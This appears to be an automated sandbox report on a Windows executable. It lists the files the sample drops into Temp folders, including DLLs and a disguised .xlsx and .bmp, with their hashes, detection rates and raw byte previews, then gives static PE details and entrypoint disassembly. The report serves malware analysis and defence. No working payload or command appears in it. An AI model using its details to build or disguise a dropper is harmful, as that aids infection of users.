                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1053696
                                                                                                                                                                                                                                                                          Entropy (8bit):6.539052666912709
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
                                                                                                                                                                                                                                                                          MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
                                                                                                                                                                                                                                                                          SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
                                                                                                                                                                                                                                                                          SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
                                                                                                                                                                                                                                                                          SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\QtXml4.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):356352
                                                                                                                                                                                                                                                                          Entropy (8bit):6.447802510709224
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
                                                                                                                                                                                                                                                                          MD5:E9A9411D6F4C71095C996A406C56129D
                                                                                                                                                                                                                                                                          SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
                                                                                                                                                                                                                                                                          SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
                                                                                                                                                                                                                                                                          SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):6487736
                                                                                                                                                                                                                                                                          Entropy (8bit):7.518089126573906
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
                                                                                                                                                                                                                                                                          MD5:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                                                                                                                          SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
                                                                                                                                                                                                                                                                          SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
                                                                                                                                                                                                                                                                          SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\StarBurn.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):664064
                                                                                                                                                                                                                                                                          Entropy (8bit):6.953961612144461
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
                                                                                                                                                                                                                                                                          MD5:A147F46E2E1F315AA219482D645BEED9
                                                                                                                                                                                                                                                                          SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
                                                                                                                                                                                                                                                                          SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
                                                                                                                                                                                                                                                                          SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\hypochondriac.xlsx

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):60283
                                                                                                                                                                                                                                                                          Entropy (8bit):4.569551839311306
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                                                                                                                          MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                                                                                                                          SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                                                                                                                          SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                                                                                                                          SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcp100.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):421200
                                                                                                                                                                                                                                                                          Entropy (8bit):6.59808962341698
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                                                                                                                          MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                                                                                                                          SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                                                                                                                          SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                                                                                                                          SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dll

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):770384
                                                                                                                                                                                                                                                                          Entropy (8bit):6.908020029901359
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                                                                                                                          MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                                                                                                                          SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                                                                                                                          SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                                                                                                                          SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\wiggery.bmp

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):4485813
                                                                                                                                                                                                                                                                          Entropy (8bit):7.960501110953352
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:98304:zvf5BQTYhbOg6IdJogvR31mRCbJ2O4qm08UhFdFtZ7C5Bd6wKWgSKNKk8R:zvhy2cW31mRCbEqf8UhFiBdQ+kO
                                                                                                                                                                                                                                                                          MD5:B56FE6EA5F9CAFB0C73A95A3377C8CA1
                                                                                                                                                                                                                                                                          SHA1:252F48E39D28A5554152F32F23A406E4E9E752DD
                                                                                                                                                                                                                                                                          SHA-256:04C5B808B740AC5F17B12956AD0D1B2C21EA1D6A6011275AC2A0D08B454EDB6A
                                                                                                                                                                                                                                                                          SHA-512:1A094CD5029F1D2BD0E804EC7F1911CF25CE319BEF3EB03BC57DF09A5BCF5957C813F9F7FF57B936F0596E0E00F3B447E2E2C3B5BAE9F3AD99BEB63C441DC0D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.b...C.y.y.m..L......\^..n.N.HQ..n.Eh.....l..q.JY.kE....peI.k.c..mE..c.Lr\p...ZTW.X.qo.s.x..HHb.f.aq..s.\E^^mYoR_Cb...].xBM.xR.[.kpg.MGx_.x.Xkx..._...jilM.[.CAm....tV...wtM...ywlI..yU.S.WQHig..w.].Sx_QX]...LLL_sC.P.y.pj.TgH.C..dOC.RqnoF....Qv.....b.m..M.]X.L.hvbeZ..f.ma....tNrr.Cbe..S..Yvnjbh...C..mqWsjglcP.W.Mu.TIq..fYcf.K..WbMIp...IRn[.G..Y..V.._..]..L].U...L]O..L.uHt`.._VBuVd.hK.DhxRlwPY[...xo....F^SLA.....[gXWLVF.......wX.w.b...nlUr.E.D...UN.f..JM.f.T.CF.....yO.RmS]..d.^e...O..b.^\K^.......kc[U...yfym...Vc..a.oUd.rD.kDWFLcL.UIZM.cfQK.e^..hvr.oxq.FI..QNP...LQT..q...h..i_.hA.mu.d......HKg.UK...tL...x...q^...h.._.q.LT.g.t]do.BM.S.HKj[..q..R.[O^.E.IV.v..hfA.mh..^N..h.......Th..shY...xLOtm\Jl.\fZ..g.b.b.`....A.ao.f..^.y...of...B..y....R..W.P..nYuE..F.X...Wv.V..\^.rR.^..X....]gxml.ukp.Vc.f.F..A...K....Pix.IObhW_^C...^.....A.y..QUH.vg.W\o..hZ......MM....gK..L..m...E..T.O.i....pNt.Y..J...tD.n_...]JEfbw.p...f.^^.I..Y..L..QJb.M.i.H..........q..u..W^...Kv.T.y..fCeqB.l......bDm...._xd.].p.l..U

                                                                                                                                                                                                                                                                          C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):14302064
                                                                                                                                                                                                                                                                          Entropy (8bit):7.991632876953663
                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                          SSDEEP:393216:naTis2twlNkiqrp/dKXKdt08/dEy0z+Zm1X8SN3y0rJEMlw:naTutwjk93KXHaZ06Zm1MSN3jw
                                                                                                                                                                                                                                                                          MD5:2C6652F7E01283DE091B5200B7878E69
                                                                                                                                                                                                                                                                          SHA1:C7503315A496A65C28E4BE9FB397FFB830C54F8F
                                                                                                                                                                                                                                                                          SHA-256:C1E1F6EB7AC42447F53711EAE48AF5B53FB6D75C9CE43CF7E4EDC413CCFB36F4
                                                                                                                                                                                                                                                                          SHA-512:896B0BBD6E8F9E64472589A92C52537FC0140D9E05856A8E2578734E6C0D3D5D57562A63598FCB6E5A20CEA153C74884505D25E2971061DDA45C82F30C3B23AF
                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Gc..............Hz......Hz.....L~......L~......L~..(...k..W...Hz......Hz......Hz..........^....~.......~,.......D......~......Rich............................PE..L....p-d..............."............Pj............@.......................................@.................................H............N...................P..h_..`...T...............................@....................... ....................text...9........................... ..`.rdata..L...........................@..@.data...............................@....didat..............................@....wixburn0...........................@..@.rsrc....N.......P..................@..@.reloc..h_...P...`..................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                          Entropy (8bit):7.991646972369456
                                                                                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                                          File name:kXzODlqJak.exe
                                                                                                                                                                                                                                                                          File size:14'323'584 bytes
                                                                                                                                                                                                                                                                          MD5:ab79eafcce0d6eff856b259977e480e1
                                                                                                                                                                                                                                                                          SHA1:736603a24e9b143a644c1fe3673c7ac7fbeee37c
                                                                                                                                                                                                                                                                          SHA256:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075
                                                                                                                                                                                                                                                                          SHA512:1aaaffb13ac1d9d400c3409ab00398fca33c1e118e4e9f8f6e1c4534f632693086d5f2525930b92473fb784551d4853679ea1cf7e395ab6dd7dfb138e6957f07
                                                                                                                                                                                                                                                                          SSDEEP:393216:naTis2twlNkiqrp/dKXKdt08/dEy0z+Zm1X8SN3y0rJEMl7:naTutwjk93KXHaZ06Zm1MSN3j7
                                                                                                                                                                                                                                                                          TLSH:CCE63331A1A2303FE6F52DB3B92496343D6CB2181B5486FEC6D0E84D38689D56EF7346
                                                                                                                                                                                                                                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Gc..............Hz......Hz......L~......L~......L~..(....k..W...Hz......Hz......Hz..........^....~.......~,.......D......~.....

                                                                                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                                                                                          Icon Hash:2d2e3797b32b2b99

                                                                                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Entrypoint:0x446a50
                                                                                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                          Time Stamp:0x642D70FB [Wed Apr 5 13:00:43 2023 UTC]
                                                                                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                                                                                                          Import Hash:657e40fb09b2c5e277b865a7cf2b8089

                                                                                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                                                                                          call 00007F50807F92A8h
                                                                                                                                                                                                                                                                          jmp 00007F50807F8C9Dh
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          retn 0000h
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          or ecx, eax
                                                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                          jne 00007F50807F8E2Bh
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+04h]
                                                                                                                                                                                                                                                                          mul ecx
                                                                                                                                                                                                                                                                          retn 0010h
                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                          mul ecx
                                                                                                                                                                                                                                                                          mov ebx, eax
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                          mul dword ptr [esp+14h]
                                                                                                                                                                                                                                                                          add ebx, eax
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+08h]
                                                                                                                                                                                                                                                                          mul ecx
                                                                                                                                                                                                                                                                          add edx, ebx
                                                                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                                                                          retn 0010h
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          int3
                                                                                                                                                                                                                                                                          push ebx
                                                                                                                                                                                                                                                                          push esi
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+18h]
                                                                                                                                                                                                                                                                          or eax, eax
                                                                                                                                                                                                                                                                          jne 00007F50807F8E3Ah
                                                                                                                                                                                                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          xor edx, edx
                                                                                                                                                                                                                                                                          div ecx
                                                                                                                                                                                                                                                                          mov ebx, eax
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                          div ecx
                                                                                                                                                                                                                                                                          mov edx, ebx
                                                                                                                                                                                                                                                                          jmp 00007F50807F8E63h
                                                                                                                                                                                                                                                                          mov ecx, eax
                                                                                                                                                                                                                                                                          mov ebx, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                          mov edx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                          shr ecx, 1
                                                                                                                                                                                                                                                                          rcr ebx, 1
                                                                                                                                                                                                                                                                          shr edx, 1
                                                                                                                                                                                                                                                                          rcr eax, 1
                                                                                                                                                                                                                                                                          or ecx, ecx
                                                                                                                                                                                                                                                                          jne 00007F50807F8E16h
                                                                                                                                                                                                                                                                          div ebx
                                                                                                                                                                                                                                                                          mov esi, eax
                                                                                                                                                                                                                                                                          mul dword ptr [esp+18h]
                                                                                                                                                                                                                                                                          mov ecx, eax
                                                                                                                                                                                                                                                                          mov eax, dword ptr [esp+14h]
                                                                                                                                                                                                                                                                          mul esi
                                                                                                                                                                                                                                                                          add edx, ecx
                                                                                                                                                                                                                                                                          jc 00007F50807F8E30h
                                                                                                                                                                                                                                                                          cmp edx, dword ptr [esp+10h]
                                                                                                                                                                                                                                                                          jnbe 00007F50807F8E2Ah
                                                                                                                                                                                                                                                                          jc 00007F50807F8E29h
                                                                                                                                                                                                                                                                          cmp eax, dword ptr [esp+0Ch]
                                                                                                                                                                                                                                                                          jbe 00007F50807F8E23h
                                                                                                                                                                                                                                                                          dec esi
                                                                                                                                                                                                                                                                          xor edx, edx
                                                                                                                                                                                                                                                                          mov eax, esi
                                                                                                                                                                                                                                                                          pop esi
                                                                                                                                                                                                                                                                          pop ebx
                                                                                                                                                                                                                                                                          retn 0010h

                                                                                                                                                                                                                                                                          Data Directories

                                                                                                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x9a7480xb4.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xa00000x4efc.rsrc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xa50000x5f68.reloc
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x995600x54.rdata
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x995c00x18.rdata
